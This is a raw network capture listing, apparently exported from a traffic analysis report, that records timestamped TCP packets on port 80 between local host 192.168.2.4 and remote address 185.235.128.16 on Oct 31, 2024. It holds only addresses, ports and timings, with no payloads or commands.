                                                                                                                                            Oct 31, 2024 17:12:22.686156034 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.686166048 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.686171055 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.686187029 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.686203003 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.686203003 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.686203003 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.686218023 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.686229944 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.686235905 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.686249971 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.686252117 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.686274052 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.686299086 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687011003 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687026978 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687040091 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687055111 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687062025 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687071085 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687082052 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687087059 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687100887 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687104940 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687119961 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687123060 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687129974 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687140942 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687144041 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687155008 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687161922 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687186003 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687197924 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687809944 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687824965 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687839985 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687854052 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687860966 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687872887 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687877893 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687890053 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687902927 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687905073 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687921047 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687927008 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687937975 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687947989 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.687952995 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.687972069 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.688539982 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.688663960 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.688682079 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.688694954 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.688714027 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.688735008 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.799627066 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.799643993 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.799659014 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.799732924 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.799767971 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.799782038 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.799798012 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.799813032 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.799829006 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.799838066 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.799849987 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.799860001 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.799889088 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800071001 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800095081 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800110102 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800121069 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800124884 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800131083 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800141096 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800153017 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800157070 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800164938 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800178051 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800189018 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800193071 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800200939 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800223112 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800242901 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800617933 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800632954 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800647020 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800662041 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800669909 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800678015 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800683022 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800692081 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800694942 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800704956 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800712109 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.800731897 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800740004 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.800761938 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801044941 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801059961 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801074982 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801089048 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801090956 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801100969 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801107883 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801122904 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801124096 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801136971 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801140070 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801156044 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801156998 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801181078 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801208019 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801506042 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801521063 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801534891 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801551104 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801554918 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801568031 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801570892 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801582098 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801600933 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801616907 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801795006 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801810026 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801826000 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801839113 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801851988 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.801852942 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801876068 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.801886082 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.802072048 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802088022 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802102089 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802119970 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.802124023 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802139044 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.802139997 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802159071 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802162886 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.802175999 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802186012 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.802191973 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802205086 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.802208900 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802218914 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.802226067 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802237034 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.802258968 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.802782059 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802795887 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802809954 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802824974 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802839041 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.802839041 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802851915 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.802856922 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.802881956 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.802901983 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803078890 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803124905 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803145885 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803163052 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803178072 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803189993 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803194046 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803210974 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803225040 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803244114 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803503036 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803519011 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803533077 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803550959 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803555965 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803571939 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803586006 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803601027 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803612947 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803612947 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803612947 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803617954 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803627014 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803633928 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803648949 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803653002 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803664923 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803667068 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803680897 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803694010 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803697109 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.803724051 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.803741932 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.804344893 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.804359913 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.804374933 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.804388046 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.804394007 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.804405928 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.804406881 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.804423094 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.804429054 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.804440022 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.804455996 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.804456949 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.804474115 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.804478884 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.804505110 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.804527044 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.916960001 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.917005062 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.917022943 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.917114019 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.917144060 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.917156935 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.917174101 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.917201042 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.917226076 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.917558908 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.917608023 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.917627096 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.917644978 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.917671919 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.917685032 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.917843103 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.917861938 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.917879105 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.917893887 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.917896986 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.917907000 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.917927027 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.917939901 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.918216944 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918232918 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918248892 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918263912 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918266058 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.918277979 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.918279886 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918299913 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918303967 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.918328047 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.918355942 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.918777943 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918795109 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918809891 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918824911 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918828964 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.918842077 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918848991 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.918859959 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918874979 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918878078 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.918893099 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918900013 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.918910027 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.918931961 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.918947935 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.919548035 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.919565916 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.919580936 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.919595957 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.919596910 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.919611931 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.919627905 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.919629097 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.919644117 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.919647932 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.919662952 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.919663906 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.919680119 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.919722080 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.919722080 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.920238018 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.920281887 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.920300961 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.920316935 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.920330048 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.920342922 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.920367956 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.920557976 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.920573950 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.920588970 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.920603991 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.920617104 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.920617104 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.920619965 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.920636892 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.920644045 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.920654058 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.920669079 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.920670986 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.920685053 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.920692921 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.920701027 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.920721054 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.920738935 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.921513081 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.921530962 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.921545982 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.921569109 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.921570063 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.921581030 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.921586990 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.921602011 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:22.921610117 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:22.921617985 CET8049754185.235.128.16192.168.2.4
